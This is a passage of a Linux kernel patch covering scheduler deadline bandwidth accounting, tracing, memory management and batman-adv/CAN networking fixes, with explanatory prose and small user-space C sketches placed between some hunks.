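            dst->nr_migrate = n;      /* remember the pending move */
            dst->migrate_bw = bw;
            return 0;
    }

    static void attach(struct cs *dst, struct cs *src)
    {
            dst->nr_dl += dst->nr_migrate;  /* phase 2: commit counters */
            src->nr_dl -= dst->nr_migrate;
            dst->nr_migrate = 0;
            dst->migrate_bw = 0;
    }

    static void cancel_attach(struct bwpool *p, struct cs *dst)
    {
            p->used -= dst->migrate_bw;     /* rollback the reservation */
            dst->nr_migrate = 0;
            dst->migrate_bw = 0;
    }
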
+diff --git a/kernel/sched/core.c b/kernel/sched/core.c
+index b23dcbeacdf33..0f6a92737c912 100644
+--- a/kernel/sched/core.c
++++ b/kernel/sched/core.c
+@@ -7475,6 +7475,7 @@ static int __sched_setscheduler(struct task_struct *p,
+ 	int reset_on_fork;
+ 	int queue_flags = DEQUEUE_SAVE | DEQUEUE_MOVE | DEQUEUE_NOCLOCK;
+ 	struct rq *rq;
++	bool cpuset_locked = false;
+ 
+ 	/* The pi code expects interrupts enabled */
+ 	BUG_ON(pi && in_interrupt());
+@@ -7524,8 +7525,14 @@ recheck:
+ 			return retval;
+ 	}
+ 
+-	if (pi)
+-		cpuset_read_lock();
++	/*
++	 * SCHED_DEADLINE bandwidth accounting relies on stable cpusets
++	 * information.
++	 */
++	if (dl_policy(policy) || dl_policy(p->policy)) {
++		cpuset_locked = true;
++		cpuset_lock();
++	}
+ 
+ 	/*
+ 	 * Make sure no PI-waiters arrive (or leave) while we are
+@@ -7601,8 +7608,8 @@ change:
+ 	if (unlikely(oldpolicy != -1 && oldpolicy != p->policy)) {
+ 		policy = oldpolicy = -1;
+ 		task_rq_unlock(rq, p, &rf);
+-		if (pi)
+-			cpuset_read_unlock();
++		if (cpuset_locked)
++			cpuset_unlock();
+ 		goto recheck;
+ 	}
+ 
+@@ -7669,7 +7676,8 @@ change:
+ 	task_rq_unlock(rq, p, &rf);
+ 
+ 	if (pi) {
+-		cpuset_read_unlock();
++		if (cpuset_locked)
++			cpuset_unlock();
+ 		rt_mutex_adjust_pi(p);
+ 	}
+ 
+@@ -7681,8 +7689,8 @@ change:
+ 
+ unlock:
+ 	task_rq_unlock(rq, p, &rf);
+-	if (pi)
+-		cpuset_read_unlock();
++	if (cpuset_locked)
++		cpuset_unlock();
+ 	return retval;
+ }
+ 
+@@ -9075,8 +9083,7 @@ int cpuset_cpumask_can_shrink(const struct cpumask *cur,
+ 	return ret;
+ }
+ 
+-int task_can_attach(struct task_struct *p,
+-		    const struct cpumask *cs_effective_cpus)
++int task_can_attach(struct task_struct *p)
+ {
+ 	int ret = 0;
+ 
+@@ -9089,21 +9096,9 @@ int task_can_attach(struct task_struct *p,
+ 	 * success of set_cpus_allowed_ptr() on all attached tasks
+ 	 * before cpus_mask may be changed.
+ 	 */
+-	if (p->flags & PF_NO_SETAFFINITY) {
++	if (p->flags & PF_NO_SETAFFINITY)
+ 		ret = -EINVAL;
+-		goto out;
+-	}
+ 
+-	if (dl_task(p) && !cpumask_intersects(task_rq(p)->rd->span,
+-					      cs_effective_cpus)) {
+-		int cpu = cpumask_any_and(cpu_active_mask, cs_effective_cpus);
+-
+-		if (unlikely(cpu >= nr_cpu_ids))
+-			return -EINVAL;
+-		ret = dl_cpu_busy(cpu, p);
+-	}
+-
+-out:
+ 	return ret;
+ }
+ 
+@@ -9385,7 +9380,7 @@ static void cpuset_cpu_active(void)
+ static int cpuset_cpu_inactive(unsigned int cpu)
+ {
+ 	if (!cpuhp_tasks_frozen) {
+-		int ret = dl_cpu_busy(cpu, NULL);
++		int ret = dl_bw_check_overflow(cpu);
+ 
+ 		if (ret)
+ 			return ret;
+diff --git a/kernel/sched/deadline.c b/kernel/sched/deadline.c
+index f7d381b6c3133..9ce9810861ba5 100644
+--- a/kernel/sched/deadline.c
++++ b/kernel/sched/deadline.c
+@@ -16,6 +16,8 @@
+  *                    Fabio Checconi <fchecconi@gmail.com>
+  */
+ 
++#include <linux/cpuset.h>
++
+ /*
+  * Default limits for DL period; on the top end we guard against small util
+  * tasks still getting ridiculously long effective runtimes, on the bottom end we
+@@ -2597,6 +2599,12 @@ static void switched_from_dl(struct rq *rq, struct task_struct *p)
+ 	if (task_on_rq_queued(p) && p->dl.dl_runtime)
+ 		task_non_contending(p);
+ 
++	/*
++	 * In case a task is setscheduled out from SCHED_DEADLINE we need to
++	 * keep track of that on its cpuset (for correct bandwidth tracking).
++	 */
++	dec_dl_tasks_cs(p);
++
+ 	if (!task_on_rq_queued(p)) {
+ 		/*
+ 		 * Inactive timer is armed. However, p is leaving DEADLINE and
+@@ -2637,6 +2645,12 @@ static void switched_to_dl(struct rq *rq, struct task_struct *p)
+ 	if (hrtimer_try_to_cancel(&p->dl.inactive_timer) == 1)
+ 		put_task_struct(p);
+ 
++	/*
++	 * In case a task is setscheduled to SCHED_DEADLINE we need to keep
++	 * track of that on its cpuset (for correct bandwidth tracking).
++	 */
++	inc_dl_tasks_cs(p);
++
+ 	/* If p is not queued we will update its parameters at next wakeup. */
+ 	if (!task_on_rq_queued(p)) {
+ 		add_rq_bw(&p->dl, &rq->dl);
+@@ -3023,26 +3037,38 @@ int dl_cpuset_cpumask_can_shrink(const struct cpumask *cur,
+ 	return ret;
+ }
+ 
+-int dl_cpu_busy(int cpu, struct task_struct *p)
++enum dl_bw_request {
++	dl_bw_req_check_overflow = 0,
++	dl_bw_req_alloc,
++	dl_bw_req_free
++};
++
++static int dl_bw_manage(enum dl_bw_request req, int cpu, u64 dl_bw)
+ {
+-	unsigned long flags, cap;
++	unsigned long flags;
+ 	struct dl_bw *dl_b;
+-	bool overflow;
++	bool overflow = 0;
+ 
+ 	rcu_read_lock_sched();
+ 	dl_b = dl_bw_of(cpu);
+ 	raw_spin_lock_irqsave(&dl_b->lock, flags);
+-	cap = dl_bw_capacity(cpu);
+-	overflow = __dl_overflow(dl_b, cap, 0, p ? p->dl.dl_bw : 0);
+ 
+-	if (!overflow && p) {
+-		/*
+-		 * We reserve space for this task in the destination
+-		 * root_domain, as we can't fail after this point.
+-		 * We will free resources in the source root_domain
+-		 * later on (see set_cpus_allowed_dl()).
+-		 */
+-		__dl_add(dl_b, p->dl.dl_bw, dl_bw_cpus(cpu));
++	if (req == dl_bw_req_free) {
++		__dl_sub(dl_b, dl_bw, dl_bw_cpus(cpu));
++	} else {
++		unsigned long cap = dl_bw_capacity(cpu);
++
++		overflow = __dl_overflow(dl_b, cap, 0, dl_bw);
++
++		if (req == dl_bw_req_alloc && !overflow) {
++			/*
++			 * We reserve space in the destination
++			 * root_domain, as we can't fail after this point.
++			 * We will free resources in the source root_domain
++			 * later on (see set_cpus_allowed_dl()).
++			 */
++			__dl_add(dl_b, dl_bw, dl_bw_cpus(cpu));
++		}
+ 	}
+ 
+ 	raw_spin_unlock_irqrestore(&dl_b->lock, flags);
+@@ -3050,6 +3076,21 @@ int dl_cpu_busy(int cpu, struct task_struct *p)
+ 
+ 	return overflow ? -EBUSY : 0;
+ }
++
++int dl_bw_check_overflow(int cpu)
++{
++	return dl_bw_manage(dl_bw_req_check_overflow, cpu, 0);
++}
++
++int dl_bw_alloc(int cpu, u64 dl_bw)
++{
++	return dl_bw_manage(dl_bw_req_alloc, cpu, dl_bw);
++}
++
++void dl_bw_free(int cpu, u64 dl_bw)
++{
++	dl_bw_manage(dl_bw_req_free, cpu, dl_bw);
++}
+ #endif
+ 
+ #ifdef CONFIG_SCHED_DEBUG
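The deadline.c hunks above fold the old dl_cpu_busy() into one dl_bw_manage() helper that dispatches on a request enum, with thin wrappers (dl_bw_check_overflow/dl_bw_alloc/dl_bw_free) for the callers; an allocation reserves bandwidth up front so nothing can fail later, and a free never fails. A minimal user-space sketch of that dispatch-and-account pattern, with an invented single-pool model rather than the kernel's per-root-domain dl_bw structures:

#include <stdio.h>

/* Request kinds, mirroring dl_bw_req_* in the patch. */
enum bw_request { BW_REQ_CHECK_OVERFLOW, BW_REQ_ALLOC, BW_REQ_FREE };

/* Toy bandwidth pool; the kernel tracks this per root_domain. */
struct bw_pool { unsigned long long cap, used; };

/* Single entry point: check, reserve, or release bandwidth. */
static int bw_manage(struct bw_pool *p, enum bw_request req,
                     unsigned long long bw)
{
    if (req == BW_REQ_FREE) {
        p->used -= bw;              /* release never fails */
        return 0;
    }
    if (p->used + bw > p->cap)      /* would the pool overflow? */
        return -1;                  /* the kernel returns -EBUSY here */
    if (req == BW_REQ_ALLOC)
        p->used += bw;              /* reserve up front, can't fail later */
    return 0;
}

int main(void)
{
    struct bw_pool pool = { .cap = 100, .used = 0 };
    printf("alloc 60: %d\n", bw_manage(&pool, BW_REQ_ALLOC, 60));  /* 0  */
    printf("alloc 50: %d\n", bw_manage(&pool, BW_REQ_ALLOC, 50));  /* -1 */
    bw_manage(&pool, BW_REQ_FREE, 60);
    printf("check 90: %d\n", bw_manage(&pool, BW_REQ_CHECK_OVERFLOW, 90));
    return 0;
}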
+diff --git a/kernel/sched/sched.h b/kernel/sched/sched.h
+index d6d488e8eb554..b62d53d7c264f 100644
+--- a/kernel/sched/sched.h
++++ b/kernel/sched/sched.h
+@@ -330,7 +330,7 @@ extern void __getparam_dl(struct task_struct *p, struct sched_attr *attr);
+ extern bool __checkparam_dl(const struct sched_attr *attr);
+ extern bool dl_param_changed(struct task_struct *p, const struct sched_attr *attr);
+ extern int  dl_cpuset_cpumask_can_shrink(const struct cpumask *cur, const struct cpumask *trial);
+-extern int  dl_cpu_busy(int cpu, struct task_struct *p);
++extern int  dl_bw_check_overflow(int cpu);
+ 
+ #ifdef CONFIG_CGROUP_SCHED
+ 
+diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c
+index af33c5a4166d4..1a87cb70f1eb5 100644
+--- a/kernel/trace/trace.c
++++ b/kernel/trace/trace.c
+@@ -4128,8 +4128,15 @@ static void *s_start(struct seq_file *m, loff_t *pos)
+ 	 * will point to the same string as current_trace->name.
+ 	 */
+ 	mutex_lock(&trace_types_lock);
+-	if (unlikely(tr->current_trace && iter->trace->name != tr->current_trace->name))
++	if (unlikely(tr->current_trace && iter->trace->name != tr->current_trace->name)) {
++		/* Close iter->trace before switching to the new current tracer */
++		if (iter->trace->close)
++			iter->trace->close(iter);
+ 		*iter->trace = *tr->current_trace;
++		/* Reopen the new current tracer */
++		if (iter->trace->open)
++			iter->trace->open(iter);
++	}
+ 	mutex_unlock(&trace_types_lock);
+ 
+ #ifdef CONFIG_TRACER_MAX_TRACE
+@@ -5189,11 +5196,17 @@ int tracing_set_cpumask(struct trace_array *tr,
+ 				!cpumask_test_cpu(cpu, tracing_cpumask_new)) {
+ 			atomic_inc(&per_cpu_ptr(tr->array_buffer.data, cpu)->disabled);
+ 			ring_buffer_record_disable_cpu(tr->array_buffer.buffer, cpu);
++#ifdef CONFIG_TRACER_MAX_TRACE
++			ring_buffer_record_disable_cpu(tr->max_buffer.buffer, cpu);
++#endif
+ 		}
+ 		if (!cpumask_test_cpu(cpu, tr->tracing_cpumask) &&
+ 				cpumask_test_cpu(cpu, tracing_cpumask_new)) {
+ 			atomic_dec(&per_cpu_ptr(tr->array_buffer.data, cpu)->disabled);
+ 			ring_buffer_record_enable_cpu(tr->array_buffer.buffer, cpu);
++#ifdef CONFIG_TRACER_MAX_TRACE
++			ring_buffer_record_enable_cpu(tr->max_buffer.buffer, cpu);
++#endif
+ 		}
+ 	}
+ 	arch_spin_unlock(&tr->max_lock);
+diff --git a/kernel/trace/trace_irqsoff.c b/kernel/trace/trace_irqsoff.c
+index 590b3d51afae9..ba37f768e2f27 100644
+--- a/kernel/trace/trace_irqsoff.c
++++ b/kernel/trace/trace_irqsoff.c
+@@ -231,7 +231,8 @@ static void irqsoff_trace_open(struct trace_iterator *iter)
+ {
+ 	if (is_graph(iter->tr))
+ 		graph_trace_open(iter);
+-
++	else
++		iter->private = NULL;
+ }
+ 
+ static void irqsoff_trace_close(struct trace_iterator *iter)
+diff --git a/kernel/trace/trace_sched_wakeup.c b/kernel/trace/trace_sched_wakeup.c
+index 330aee1c1a49e..0469a04a355f2 100644
+--- a/kernel/trace/trace_sched_wakeup.c
++++ b/kernel/trace/trace_sched_wakeup.c
+@@ -168,6 +168,8 @@ static void wakeup_trace_open(struct trace_iterator *iter)
+ {
+ 	if (is_graph(iter->tr))
+ 		graph_trace_open(iter);
++	else
++		iter->private = NULL;
+ }
+ 
+ static void wakeup_trace_close(struct trace_iterator *iter)
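The s_start() hunk pairs every tracer switch with a close of the old iterator state and an open under the new tracer, and the irqsoff/wakeup open callbacks now clear iter->private on the non-graph path so stale graph-tracer data is never reused. A compact user-space model of that close-before-swap/open-after-swap discipline (types and names invented for illustration, not the ftrace API):

#include <stdio.h>
#include <stdlib.h>

struct iter;                                  /* forward declaration */
struct tracer {
    const char *name;
    void (*open)(struct iter *);
    void (*close)(struct iter *);
};
struct iter {
    const struct tracer *trace;
    void *private_data;                       /* per-tracer state */
};

static void graph_open(struct iter *it)  { it->private_data = malloc(64); }
static void graph_close(struct iter *it) { free(it->private_data);
                                           it->private_data = NULL; }
static void plain_open(struct iter *it)  { it->private_data = NULL; }

static const struct tracer graph = { "graph", graph_open, graph_close };
static const struct tracer plain = { "plain", plain_open, NULL };

/* Mirrors the fixed s_start(): close under the old tracer, then
 * switch, then open under the new one. */
static void switch_tracer(struct iter *it, const struct tracer *cur)
{
    if (it->trace != cur) {
        if (it->trace->close)
            it->trace->close(it);     /* old tracer frees its state */
        it->trace = cur;
        if (it->trace->open)
            it->trace->open(it);      /* new tracer sets up its own */
    }
}

int main(void)
{
    struct iter it = { .trace = &graph };
    graph.open(&it);
    switch_tracer(&it, &plain);       /* no leak, no stale private data */
    printf("private=%p\n", it.private_data);
    return 0;
}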
+diff --git a/lib/clz_ctz.c b/lib/clz_ctz.c
+index 0d3a686b5ba29..fb8c0c5c2bd27 100644
+--- a/lib/clz_ctz.c
++++ b/lib/clz_ctz.c
+@@ -28,36 +28,16 @@ int __weak __clzsi2(int val)
+ }
+ EXPORT_SYMBOL(__clzsi2);
+ 
+-int __weak __clzdi2(long val);
+-int __weak __ctzdi2(long val);
+-#if BITS_PER_LONG == 32
+-
+-int __weak __clzdi2(long val)
++int __weak __clzdi2(u64 val);
++int __weak __clzdi2(u64 val)
+ {
+-	return 32 - fls((int)val);
++	return 64 - fls64(val);
+ }
+ EXPORT_SYMBOL(__clzdi2);
+ 
+-int __weak __ctzdi2(long val)
++int __weak __ctzdi2(u64 val);
++int __weak __ctzdi2(u64 val)
+ {
+-	return __ffs((u32)val);
++	return __ffs64(val);
+ }
+ EXPORT_SYMBOL(__ctzdi2);
+-
+-#elif BITS_PER_LONG == 64
+-
+-int __weak __clzdi2(long val)
+-{
+-	return 64 - fls64((u64)val);
+-}
+-EXPORT_SYMBOL(__clzdi2);
+-
+-int __weak __ctzdi2(long val)
+-{
+-	return __ffs64((u64)val);
+-}
+-EXPORT_SYMBOL(__ctzdi2);
+-
+-#else
+-#error BITS_PER_LONG not 32 or 64
+-#endif
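The clz_ctz.c change matters on 32-bit targets: the compiler emits calls to __clzdi2()/__ctzdi2() with a 64-bit argument, so a `long` parameter silently truncated the upper word. A small host-side check of the new u64 arithmetic; comparing against the GCC builtins is this sketch's assumption, not part of the patch:

#include <stdint.h>
#include <stdio.h>
#include <assert.h>

/* fls64(): index of the most significant set bit, 1-based; 0 for 0. */
static int fls64(uint64_t x)
{
    return x ? 64 - __builtin_clzll(x) : 0;
}

/* __ffs64(): index of the least significant set bit, 0-based. */
static int ffs64(uint64_t x)
{
    return __builtin_ctzll(x);   /* caller guarantees x != 0 */
}

int main(void)
{
    uint64_t v = 0x0000010000000000ULL;   /* bit 40: upper word only */

    /* The patched definitions, computed on the full u64: */
    assert(64 - fls64(v) == __builtin_clzll(v));   /* __clzdi2 */
    assert(ffs64(v) == (int)__builtin_ctzll(v));   /* __ctzdi2 */

    /* The old 32-bit path saw only the truncated low word (0 here),
     * so 32 - fls(0) reported 32 leading zeros instead of 23. */
    printf("clz=%d ctz=%d\n", 64 - fls64(v), ffs64(v));  /* clz=23 ctz=40 */
    return 0;
}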
+diff --git a/lib/maple_tree.c b/lib/maple_tree.c
+index 47d0c95b9a01e..250b4c67fac8f 100644
+--- a/lib/maple_tree.c
++++ b/lib/maple_tree.c
+@@ -4333,6 +4333,9 @@ static inline bool mas_wr_append(struct ma_wr_state *wr_mas)
+ 	struct ma_state *mas = wr_mas->mas;
+ 	unsigned char node_pivots = mt_pivots[wr_mas->type];
+ 
++	if (mt_in_rcu(mas->tree))
++		return false;
++
+ 	if ((mas->index != wr_mas->r_min) && (mas->last == wr_mas->r_max)) {
+ 		if (new_end < node_pivots)
+ 			wr_mas->pivots[new_end] = wr_mas->pivots[end];
+diff --git a/lib/radix-tree.c b/lib/radix-tree.c
+index 3c78e1e8b2ad6..2ec38f08e4f0e 100644
+--- a/lib/radix-tree.c
++++ b/lib/radix-tree.c
+@@ -1134,7 +1134,6 @@ static void set_iter_tags(struct radix_tree_iter *iter,
+ void __rcu **radix_tree_iter_resume(void __rcu **slot,
+ 					struct radix_tree_iter *iter)
+ {
+-	slot++;
+ 	iter->index = __radix_tree_iter_add(iter, 1);
+ 	iter->next_index = iter->index;
+ 	iter->tags = 0;
+diff --git a/mm/madvise.c b/mm/madvise.c
+index d03e149ffe6e8..5973399b2f9b7 100644
+--- a/mm/madvise.c
++++ b/mm/madvise.c
+@@ -654,8 +654,8 @@ static int madvise_free_pte_range(pmd_t *pmd, unsigned long addr,
+ 		 * deactivate all pages.
+ 		 */
+ 		if (folio_test_large(folio)) {
+-			if (folio_mapcount(folio) != 1)
+-				goto out;
++			if (folio_estimated_sharers(folio) != 1)
++				break;
+ 			folio_get(folio);
+ 			if (!folio_trylock(folio)) {
+ 				folio_put(folio);
+diff --git a/mm/memory-failure.c b/mm/memory-failure.c
+index 4457f9423e2c1..99de0328d1bed 100644
+--- a/mm/memory-failure.c
++++ b/mm/memory-failure.c
+@@ -2591,10 +2591,13 @@ retry:
+ 	if (ret > 0) {
+ 		ret = soft_offline_in_use_page(page);
+ 	} else if (ret == 0) {
+-		if (!page_handle_poison(page, true, false) && try_again) {
+-			try_again = false;
+-			flags &= ~MF_COUNT_INCREASED;
+-			goto retry;
++		if (!page_handle_poison(page, true, false)) {
++			if (try_again) {
++				try_again = false;
++				flags &= ~MF_COUNT_INCREASED;
++				goto retry;
++			}
++			ret = -EBUSY;
+ 		}
+ 	}
+ 
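The soft-offline hunk tightens the error path: a failed page_handle_poison() still gets exactly one retry, but a second failure now propagates as -EBUSY instead of falling through as success. The retry-once-then-fail shape in isolation, with a stand-in poison handler invented so the example terminates:

#include <stdio.h>
#include <errno.h>

/* Stand-in for page_handle_poison(); succeeds on the retry here
 * purely so the sketch has a deterministic outcome. */
static int attempts;
static int handle_poison(void) { return ++attempts > 1; }

static int soft_offline(void)
{
    int try_again = 1;
retry:
    if (!handle_poison()) {
        if (try_again) {
            try_again = 0;
            goto retry;         /* exactly one retry, as in the patch */
        }
        return -EBUSY;          /* second failure is now an error */
    }
    return 0;
}

int main(void)
{
    printf("ret=%d\n", soft_offline());   /* 0 after one retry */
    return 0;
}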
+diff --git a/mm/shmem.c b/mm/shmem.c
+index aba041a3df739..10365ced5b1fc 100644
+--- a/mm/shmem.c
++++ b/mm/shmem.c
+@@ -800,14 +800,16 @@ unsigned long shmem_partial_swap_usage(struct address_space *mapping,
+ 	XA_STATE(xas, &mapping->i_pages, start);
+ 	struct page *page;
+ 	unsigned long swapped = 0;
++	unsigned long max = end - 1;
+ 
+ 	rcu_read_lock();
+-	xas_for_each(&xas, page, end - 1) {
++	xas_for_each(&xas, page, max) {
+ 		if (xas_retry(&xas, page))
+ 			continue;
+ 		if (xa_is_value(page))
+ 			swapped++;
+-
++		if (xas.xa_index == max)
++			break;
+ 		if (need_resched()) {
+ 			xas_pause(&xas);
+ 			cond_resched_rcu();
+diff --git a/mm/vmalloc.c b/mm/vmalloc.c
+index d5dc361dc104d..80bd104a4d42e 100644
+--- a/mm/vmalloc.c
++++ b/mm/vmalloc.c
+@@ -2909,6 +2909,10 @@ void *vmap_pfn(unsigned long *pfns, unsigned int count, pgprot_t prot)
+ 		free_vm_area(area);
+ 		return NULL;
+ 	}
++
++	flush_cache_vmap((unsigned long)area->addr,
++			 (unsigned long)area->addr + count * PAGE_SIZE);
++
+ 	return area->addr;
+ }
+ EXPORT_SYMBOL_GPL(vmap_pfn);
+diff --git a/net/Makefile b/net/Makefile
+index 6a62e5b273781..0914bea9c335f 100644
+--- a/net/Makefile
++++ b/net/Makefile
+@@ -23,6 +23,7 @@ obj-$(CONFIG_BPFILTER)		+= bpfilter/
+ obj-$(CONFIG_PACKET)		+= packet/
+ obj-$(CONFIG_NET_KEY)		+= key/
+ obj-$(CONFIG_BRIDGE)		+= bridge/
++obj-$(CONFIG_NET_DEVLINK)	+= devlink/
+ obj-$(CONFIG_NET_DSA)		+= dsa/
+ obj-$(CONFIG_ATALK)		+= appletalk/
+ obj-$(CONFIG_X25)		+= x25/
+diff --git a/net/batman-adv/bat_v_elp.c b/net/batman-adv/bat_v_elp.c
+index f1741fbfb6178..98a624f32b946 100644
+--- a/net/batman-adv/bat_v_elp.c
++++ b/net/batman-adv/bat_v_elp.c
+@@ -506,7 +506,7 @@ int batadv_v_elp_packet_recv(struct sk_buff *skb,
+ 	struct batadv_priv *bat_priv = netdev_priv(if_incoming->soft_iface);
+ 	struct batadv_elp_packet *elp_packet;
+ 	struct batadv_hard_iface *primary_if;
+-	struct ethhdr *ethhdr = (struct ethhdr *)skb_mac_header(skb);
++	struct ethhdr *ethhdr;
+ 	bool res;
+ 	int ret = NET_RX_DROP;
+ 
+@@ -514,6 +514,7 @@ int batadv_v_elp_packet_recv(struct sk_buff *skb,
+ 	if (!res)
+ 		goto free_skb;
+ 
++	ethhdr = eth_hdr(skb);
+ 	if (batadv_is_my_mac(bat_priv, ethhdr->h_source))
+ 		goto free_skb;
+ 
+diff --git a/net/batman-adv/bat_v_ogm.c b/net/batman-adv/bat_v_ogm.c
+index 033639df96d85..9f4815f4c8e89 100644
+--- a/net/batman-adv/bat_v_ogm.c
++++ b/net/batman-adv/bat_v_ogm.c
+@@ -124,8 +124,10 @@ static void batadv_v_ogm_send_to_if(struct sk_buff *skb,
+ {
+ 	struct batadv_priv *bat_priv = netdev_priv(hard_iface->soft_iface);
+ 
+-	if (hard_iface->if_status != BATADV_IF_ACTIVE)
++	if (hard_iface->if_status != BATADV_IF_ACTIVE) {
++		kfree_skb(skb);
+ 		return;
++	}
+ 
+ 	batadv_inc_counter(bat_priv, BATADV_CNT_MGMT_TX);
+ 	batadv_add_counter(bat_priv, BATADV_CNT_MGMT_TX_BYTES,
+@@ -986,7 +988,7 @@ int batadv_v_ogm_packet_recv(struct sk_buff *skb,
+ {
+ 	struct batadv_priv *bat_priv = netdev_priv(if_incoming->soft_iface);
+ 	struct batadv_ogm2_packet *ogm_packet;
+-	struct ethhdr *ethhdr = eth_hdr(skb);
++	struct ethhdr *ethhdr;
+ 	int ogm_offset;
+ 	u8 *packet_pos;
+ 	int ret = NET_RX_DROP;
+@@ -1000,6 +1002,7 @@ int batadv_v_ogm_packet_recv(struct sk_buff *skb,
+ 	if (!batadv_check_management_packet(skb, if_incoming, BATADV_OGM2_HLEN))
+ 		goto free_skb;
+ 
++	ethhdr = eth_hdr(skb);
+ 	if (batadv_is_my_mac(bat_priv, ethhdr->h_source))
+ 		goto free_skb;
+ 
+diff --git a/net/batman-adv/hard-interface.c b/net/batman-adv/hard-interface.c
+index 41c1ad33d009f..24c9c0c3f3166 100644
+--- a/net/batman-adv/hard-interface.c
++++ b/net/batman-adv/hard-interface.c
+@@ -630,7 +630,19 @@ out:
+  */
+ void batadv_update_min_mtu(struct net_device *soft_iface)
+ {
+-	soft_iface->mtu = batadv_hardif_min_mtu(soft_iface);
++	struct batadv_priv *bat_priv = netdev_priv(soft_iface);
++	int limit_mtu;
++	int mtu;
++
++	mtu = batadv_hardif_min_mtu(soft_iface);
++
++	if (bat_priv->mtu_set_by_user)
++		limit_mtu = bat_priv->mtu_set_by_user;
++	else
++		limit_mtu = ETH_DATA_LEN;
++
++	mtu = min(mtu, limit_mtu);
++	dev_set_mtu(soft_iface, mtu);
+ 
+ 	/* Check if the local translate table should be cleaned up to match a
+ 	 * new (and smaller) MTU.
+diff --git a/net/batman-adv/netlink.c b/net/batman-adv/netlink.c
+index a5e4a4e976cf3..86e0664e0511b 100644
+--- a/net/batman-adv/netlink.c
++++ b/net/batman-adv/netlink.c
+@@ -495,7 +495,10 @@ static int batadv_netlink_set_mesh(struct sk_buff *skb, struct genl_info *info)
+ 		attr = info->attrs[BATADV_ATTR_FRAGMENTATION_ENABLED];
+ 
+ 		atomic_set(&bat_priv->fragmentation, !!nla_get_u8(attr));
++
++		rtnl_lock();
+ 		batadv_update_min_mtu(bat_priv->soft_iface);
++		rtnl_unlock();
+ 	}
+ 
+ 	if (info->attrs[BATADV_ATTR_GW_BANDWIDTH_DOWN]) {
+diff --git a/net/batman-adv/soft-interface.c b/net/batman-adv/soft-interface.c
+index 0f5c0679b55a2..38d411a52f331 100644
+--- a/net/batman-adv/soft-interface.c
++++ b/net/batman-adv/soft-interface.c
+@@ -154,11 +154,14 @@ static int batadv_interface_set_mac_addr(struct net_device *dev, void *p)
+ 
+ static int batadv_interface_change_mtu(struct net_device *dev, int new_mtu)
+ {
++	struct batadv_priv *bat_priv = netdev_priv(dev);
++
+ 	/* check ranges */
+ 	if (new_mtu < 68 || new_mtu > batadv_hardif_min_mtu(dev))
+ 		return -EINVAL;
+ 
+ 	dev->mtu = new_mtu;
++	bat_priv->mtu_set_by_user = new_mtu;
+ 
+ 	return 0;
+ }
+diff --git a/net/batman-adv/translation-table.c b/net/batman-adv/translation-table.c
+index 01d30c1e412c7..5d8cee74772fe 100644
+--- a/net/batman-adv/translation-table.c
++++ b/net/batman-adv/translation-table.c
+@@ -774,7 +774,6 @@ check_roaming:
+ 		if (roamed_back) {
+ 			batadv_tt_global_free(bat_priv, tt_global,
+ 					      "Roaming canceled");
+-			tt_global = NULL;
+ 		} else {
+ 			/* The global entry has to be marked as ROAMING and
+ 			 * has to be kept for consistency purpose
+diff --git a/net/batman-adv/types.h b/net/batman-adv/types.h
+index 758cd797a063b..76791815b26ba 100644
+--- a/net/batman-adv/types.h
++++ b/net/batman-adv/types.h
+@@ -1546,6 +1546,12 @@ struct batadv_priv {
+ 	/** @soft_iface: net device which holds this struct as private data */
+ 	struct net_device *soft_iface;
+ 
++	/**
++	 * @mtu_set_by_user: MTU was set once by user
++	 * protected by rtnl_lock
++	 */
++	int mtu_set_by_user;
++
+ 	/**
+ 	 * @bat_counters: mesh internal traffic statistic counters (see
+ 	 *  batadv_counters)
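The batman-adv MTU hunks remember whether the user ever set an MTU explicitly (the new mtu_set_by_user field) and clamp the automatically computed hard-interface minimum against that, falling back to ETH_DATA_LEN otherwise. The clamping rule on its own, as a small sketch:

#include <stdio.h>

#define ETH_DATA_LEN 1500

/* Mirrors batadv_update_min_mtu(): the hard-interface minimum wins
 * only up to the user's explicit choice (or the Ethernet default). */
static int effective_mtu(int hardif_min_mtu, int mtu_set_by_user)
{
    int limit = mtu_set_by_user ? mtu_set_by_user : ETH_DATA_LEN;
    return hardif_min_mtu < limit ? hardif_min_mtu : limit;
}

int main(void)
{
    printf("%d\n", effective_mtu(1528, 0));     /* 1500: default cap */
    printf("%d\n", effective_mtu(1528, 1400));  /* 1400: user cap    */
    printf("%d\n", effective_mtu(1300, 1400));  /* 1300: hardif min  */
    return 0;
}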
+diff --git a/net/can/isotp.c b/net/can/isotp.c
+index b3c2a49b189cc..8c97f4061ffd7 100644
+--- a/net/can/isotp.c
++++ b/net/can/isotp.c
+@@ -175,12 +175,6 @@ static bool isotp_register_rxid(struct isotp_sock *so)
+ 	return (isotp_bc_flags(so) == 0);
+ }
+ 
+-static bool isotp_register_txecho(struct isotp_sock *so)
+-{
+-	/* all modes but SF_BROADCAST register for tx echo skbs */
+-	return (isotp_bc_flags(so) != CAN_ISOTP_SF_BROADCAST);
+-}
+-
+ static enum hrtimer_restart isotp_rx_timer_handler(struct hrtimer *hrtimer)
+ {
+ 	struct isotp_sock *so = container_of(hrtimer, struct isotp_sock,
+@@ -1176,7 +1170,7 @@ static int isotp_release(struct socket *sock)
+ 	lock_sock(sk);
+ 
+ 	/* remove current filters & unregister */
+-	if (so->bound && isotp_register_txecho(so)) {
++	if (so->bound) {
+ 		if (so->ifindex) {
+ 			struct net_device *dev;
+ 
+@@ -1293,14 +1287,12 @@ static int isotp_bind(struct socket *sock, struct sockaddr *uaddr, int len)
+ 		can_rx_register(net, dev, rx_id, SINGLE_MASK(rx_id),
+ 				isotp_rcv, sk, "isotp", sk);
+ 
+-	if (isotp_register_txecho(so)) {
+-		/* no consecutive frame echo skb in flight */
+-		so->cfecho = 0;
++	/* no consecutive frame echo skb in flight */
++	so->cfecho = 0;
+ 
+-		/* register for echo skb's */
+-		can_rx_register(net, dev, tx_id, SINGLE_MASK(tx_id),
+-				isotp_rcv_echo, sk, "isotpe", sk);
+-	}
++	/* register for echo skb's */
++	can_rx_register(net, dev, tx_id, SINGLE_MASK(tx_id),
++			isotp_rcv_echo, sk, "isotpe", sk);
+ 
+ 	dev_put(dev);
+ 
+@@ -1521,7 +1513,7 @@ static void isotp_notify(struct isotp_sock *so, unsigned long msg,
+ 	case NETDEV_UNREGISTER:
+ 		lock_sock(sk);
+ 		/* remove current filters & unregister */
+-		if (so->bound && isotp_register_txecho(so)) {
++		if (so->bound) {
+ 			if (isotp_register_rxid(so))
+ 				can_rx_unregister(dev_net(dev), dev, so->rxid,
+ 						  SINGLE_MASK(so->rxid),
